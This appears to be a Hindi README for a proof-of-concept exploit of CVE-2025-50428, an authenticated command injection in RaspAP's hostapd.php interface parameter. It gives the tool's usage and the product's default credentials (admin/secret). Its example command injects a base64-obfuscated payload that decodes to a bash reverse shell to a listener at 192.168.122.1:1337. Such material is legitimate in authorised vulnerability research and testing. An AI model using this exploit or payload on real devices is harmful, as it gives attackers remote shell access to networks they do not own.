
CVE-2025-50428 भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट: RaspAP में प्रमाणित OS कमांड इंजेक्शन
| भेद्यता आईडी | CVE-2025-50428 |
|---|
| गंभीरता | उच्च (CVSS 3.1: 8.6) |
| CVSS वेक्टर | CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| भेद्यता प्रकार | कोड इंजेक्शन |
| हमला वेक्टर | दूरस्थ (प्रमाणित) |
| आवश्यक विशेषाधिकार | निम्न |
| प्रभाव | कोड निष्पादन, विशेषाधिकार वृद्धि |
| प्रभावित उत्पाद | raspap-webgui ≤ 3.2.9 |
| खोजकर्ता | SmartTECS Cyber Security GmbH |
यह एक्सप्लॉइट RaspAP के hostapd.php स्क्रिप्ट में एक कमांड इंजेक्शन भेद्यता को लक्षित करता है। यह भेद्यता interface पैरामीटर के माध्यम से पारित उपयोगकर्ता इनपुट के उचित सैनिटाइज़ेशन न होने के कारण मौजूद है। एक प्रमाणित हमलावर मनमाने OS कमांड इंजेक्ट कर सकता है, जिसके परिणामस्वरूप www-data उपयोगकर्ता के विशेषाधिकारों के साथ कोड निष्पादन होता है।
requests लाइब्रेरी स्थापित होpython3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]
--base-url: RaspAP इंस्टॉलेशन का आधार URL (जैसे, http://192.168.122.22)--interface: interface पैरामीटर का मान, इंजेक्शन पेलोड की अनुमति है--username: RaspAP उपयोगकर्ता नाम (डिफ़ॉल्ट: admin)--password: RaspAP पासवर्ड (डिफ़ॉल्ट: secret)python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"
SmartTECS Cyber Security GmbH एक साइबर सुरक्षा कंपनी है जो पेनेट्रेशन टेस्टिंग, सुरक्षित सॉफ्टवेयर विकास और भेद्यता अनुसंधान में विशेषज्ञता रखती है। कंपनी संगठनों को बदलते साइबर खतरों से महत्वपूर्ण प्रणालियों की सुरक्षा में मदद करने के लिए अनुकूलित सुरक्षा मूल्यांकन, घटना प्रतिक्रिया और रणनीतिक सलाहकार सेवाएं प्रदान करती है।
यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके स्वामित्व या प्रशासन के लिए स्पष्ट अनुमति हो। लेखक और SmartTECS Cyber Security GmbH दुरुपयोग या क्षति के लिए कोई दायित्व नहीं लेते हैं।